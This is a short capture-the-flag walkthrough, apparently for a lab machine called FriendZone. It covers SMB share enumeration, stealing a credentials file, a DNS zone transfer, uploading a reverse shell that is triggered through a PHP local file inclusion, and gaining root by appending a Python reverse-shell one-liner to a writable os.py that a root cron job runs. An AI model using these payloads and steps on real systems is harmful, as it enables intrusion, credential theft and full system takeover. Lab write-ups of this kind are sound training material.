Enum standard + extra smb

nmap -sC -sV -O
nmap --script=smb-enum-shares 

Grab cred.txt

smbclient //
get creds.txt

Zone Transfer to find subdomains

dig axfr friendzone.red @

Add subdomains to /etc/hosts friendzone.red administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red

Login as administrator1 with credentials found from cred.txt

Upload reverse shell through SMB

smbclient //
put r

Prepare nc to grab reverse shell

nc -lnvp 4455

Use LFI through dashboard.php to trigger reverse shell.
With previous enumeration of smb shares we found the path to /etc/Development where our shell will be uploaded.


Probably smart to upload a test file, like <?php phpinfo(); ?>, before going for the reverse shell.

The php call will look something like this: <?php “include/”.include($_GET['pagename'].“.php”); ?>
Do not end your filename with .php as this is already done in the code and you’ll create a double file ending.

Grab user: /home/friend/user.txt

Grab SSH-creds:

ls /var/www/htm/mysql_data.conf


ssh friend@

Look on executing services with pspy64:

2019/06/18 16:24:01 CMD: UID=0    PID=4059   | /bin/sh -c /opt/server_admin/reporter.py 
2019/06/18 16:24:01 CMD: UID=0    PID=4058   | /bin/sh -c /opt/server_admin/reporter.py 
2019/06/18 16:24:01 CMD: UID=0    PID=4057   | /usr/sbin/CRON -f 

Investigate the script reporter.py and we find that it uses import os.

With ls -l1 we find that we have +r+w one the file /usr/lib/python2.7/os.py

Add a python reverse shell at the end of os.py and wait for cron to trigger it.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4488));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Start nc -lvnp 4488 and grab root.txt